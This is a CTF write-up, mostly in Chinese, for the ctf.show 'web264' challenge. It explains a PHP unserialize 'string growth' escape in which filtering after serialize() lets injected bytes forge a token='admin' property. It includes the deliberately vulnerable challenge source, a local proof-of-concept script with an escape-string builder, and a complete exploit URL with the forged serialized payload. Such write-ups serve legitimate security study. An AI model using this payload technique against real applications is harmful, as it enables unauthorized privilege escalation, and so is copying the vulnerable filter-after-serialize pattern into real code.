web264

看源码

index.php

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-12-03 02:37:19

# @Last Modified by:   h1xa

# @Last Modified time: 2020-12-03 16:05:38

# @message.php

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/





error_reporting(0);  // hides every notice/warning, including anything serialize()/$_GET would say about odd input

// $_SESSION is the hand-off channel to message.php: what index.php stores under 'msg'
// is what message.php later unserialize()s, keyed by the PHPSESSID cookie.
session_start();



// Plain data holder that gets serialize()d below. PHP serializes declared properties in
// declaration order (from, msg, to, token), which is the order an injected serialized
// fragment has to reproduce. `token` is never taken from user input; the only way to
// change it is to tamper with the serialized form.
class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    // $f, $m, $t come straight from $_GET (see below); nothing is validated here.
    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}



// Raw, untrusted query-string input. Reading a missing key only produces a notice
// (silenced by error_reporting(0) above), so the isset() guard below is the real check.
$f = $_GET['f'];

$m = $_GET['m'];

$t = $_GET['t'];



if(isset($f) && isset($m) && isset($t)){

    $msg = new message($f,$m,$t);

    // VULNERABLE: the word filter runs on the *serialized* string, after serialize() has
    // already written each property's byte length as s:N:"...". Every 'fuck' (4 bytes)
    // becomes 'loveU' (5 bytes), so each occurrence inside $from pushes one extra byte
    // past the recorded N; unserialize() later reads exactly N bytes and parses the
    // surplus as further properties. Filtering has to happen before serialize() (or on
    // the plain fields), never on the serialized form.
    $umsg = str_replace('fuck', 'loveU', serialize($msg));

    // Not echoed back: stored in the session and consumed by message.php under the same PHPSESSID.
    $_SESSION['msg']=base64_encode($umsg);

    echo 'Your message has been sent';

}



highlight_file(__FILE__);  // the challenge deliberately discloses its own source


message.php

 <?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-12-03 15:13:03

# @Last Modified by:   h1xa

# @Last Modified time: 2020-12-03 15:17:17

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/

session_start();           // resumes the session index.php wrote $_SESSION['msg'] into (same PHPSESSID cookie)

highlight_file(__FILE__);  // source disclosure is intentional for the challenge

include('flag.php');       // presumably defines $flag, which is echoed below; the file itself is not shown here



// Must stay identical to the class in index.php: unserialize() rebuilds the object by
// class name, and the property layout (from, msg, to, token) is what the serialized
// string encodes. Only `token` is ever inspected on this side.
class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    // Not invoked by unserialize(); it only matters if message.php constructs objects itself.
    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}



// The cookie is only an existence gate: its value is never read. The payload itself comes
// from the session, so a request needs both a `msg` cookie (any value) and the PHPSESSID
// under which index.php stored the message.
if(isset($_COOKIE['msg'])){

    // VULNERABLE: unserialize() on data that index.php derived from user input. Because
    // index.php ran str_replace() *after* serialize(), the declared string lengths no
    // longer match the content and attacker-controlled bytes are parsed as properties.
    // Whatever follows the injected closing '}' is trailing data that unserialize()
    // ignores (PHP >= 8.3 warns about it but still returns the object -- confirm on the
    // target version). A json_decode()-based format would not have this problem.
    $msg = unserialize(base64_decode($_SESSION['msg']));

    // Loose == comparison; with a plain-string token it behaves like ===, but === is the safe form.
    if($msg->token=='admin'){

        echo $flag;

    }

}


这题是典型的字符串增长（字符变多）型反序列化逃逸：index.php 先 serialize() 再 str_replace('fuck','loveU')，每处替换多出 1 个字节，但 s:N: 中记录的长度 N 不变，多出来的字节会被 unserialize() 当作后续属性解析，于是可以伪造 token。

接着在本地构造 PoC，模拟 index.php 的替换与 message.php 的反序列化：

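<?php

/*
 * Local reproduction of the web264 "string growth" unserialize escape.
 *
 * index.php runs str_replace('fuck', 'loveU', serialize($msg)) and stores the result in the
 * session; message.php later unserialize()s it. serialize() has already recorded the byte
 * length of `from` as s:N:"...", and every replacement grows the content by one byte, so
 * the surplus bytes are parsed as the remaining properties. We append a forged tail that
 * re-supplies msg/to, sets token='admin' and closes the object, and prepend exactly
 * strlen($tail) copies of the needle so that, after replacement, the declared length N
 * ends right where the tail begins.
 */

// Same layout as the challenge class: property order is what the forged tail has to match.
class message{

    public $from;

    public $msg;

    public $to;

    public $token='user';

    public function __construct($f,$m,$t){

        $this->from = $f;

        $this->msg = $m;

        $this->to = $t;

    }

}

/**
 * Build the `from` value for a growth-based serialize escape.
 *
 * @param string $tail        Serialized fragment to smuggle out of the string; it must begin
 *                            with the closing quote of the `from` value and must not itself
 *                            contain $needle (that would add unplanned growth).
 * @param string $needle      Substring the target replaces (default 'fuck').
 * @param string $replacement What the target replaces it with; must be longer than $needle.
 * @return string $needle repeated strlen($tail)/growth times, followed by $tail.
 * @throws InvalidArgumentException when the replacement does not grow the string, when the
 *         tail length is not a multiple of the growth per replacement, or when the tail
 *         contains the needle.
 */
function build_escape_from($tail, $needle = 'fuck', $replacement = 'loveU')
{
    $growth = strlen($replacement) - strlen($needle);
    if ($growth <= 0) {
        throw new InvalidArgumentException('replacement must be longer than needle for a growth escape');
    }
    if (strpos($tail, $needle) !== false) {
        throw new InvalidArgumentException('tail must not contain the needle');
    }
    $padLen = strlen($tail);
    if ($padLen % $growth !== 0) {
        throw new InvalidArgumentException("tail length {$padLen} is not a multiple of growth {$growth}");
    }
    // Each needle yields $growth surplus bytes; we need strlen($tail) surplus bytes in total.
    return str_repeat($needle, intdiv($padLen, $growth)) . $tail;
}

// Forged tail: closes the `from` string, supplies msg/to in declaration order, sets token
// and closes the object. Everything the server appends after this '}' (the real msg, to
// and token) becomes trailing data that unserialize() ignores. This tail is 60 bytes, so
// with a growth of 1 byte per replacement the prefix is 60 x 'fuck'.
$tail = '";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}';

$f = build_escape_from($tail);

$m = "1";

$t = '1';



if(isset($f) && isset($m) && isset($t)){

    $msg = new message($f,$m,$t);

    // Mirror of index.php: filter *after* serialize(), then base64 for the session.
    $filtered = str_replace('fuck', 'loveU', serialize($msg));

    $umsg = base64_encode($filtered);

    echo $filtered."\n";

    // Ready-to-send query string. The tail contains '"', ';', '{' and '}', so it is
    // percent-encoded rather than pasted raw into the URL.
    echo '/?' . http_build_query(['f' => $f, 'm' => $m, 't' => $t]) . "\n";

}



// Mirror of message.php: the surplus bytes are parsed as msg/to/token of the object.
$msg = unserialize(base64_decode($umsg));

echo serialize($msg)."\n";

if($msg->token=='admin') {

    echo "flag";

}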

然后构造 payload。注入的尾部 `";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}` 长 60 字节，每个 fuck→loveU 只多出 1 字节，所以 f 前面正好需要 60 个 fuck；尾部含有 `"`、`;`、`{`、`}` 等字符，建议整体 urlencode 后再发送，以免被浏览器或代理改写：

http://20d2a029-7925-4085-aae1-9464ce91f0ad.challenge.ctf.show/?f=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:0:"";s:2:"to";s:0:"";s:5:"token";s:5:"admin";}&m=1&t=1

先带上 payload 访问 index.php（此时服务端把替换后的序列化串 base64 后存进 $_SESSION['msg']），再访问 message.php 触发反序列化。

注意 message.php 只检查 isset($_COOKIE['msg'])，并不会读取这个 cookie 的值，所以随便带一个 `msg=1` 的 cookie 即可；真正的 payload 在 session 里，因此必须保留访问 index.php 时拿到的 PHPSESSID。丢了 PHPSESSID 就会换到一个空的 session，$_SESSION['msg'] 不存在，unserialize() 得不到对象，自然拿不到 flag。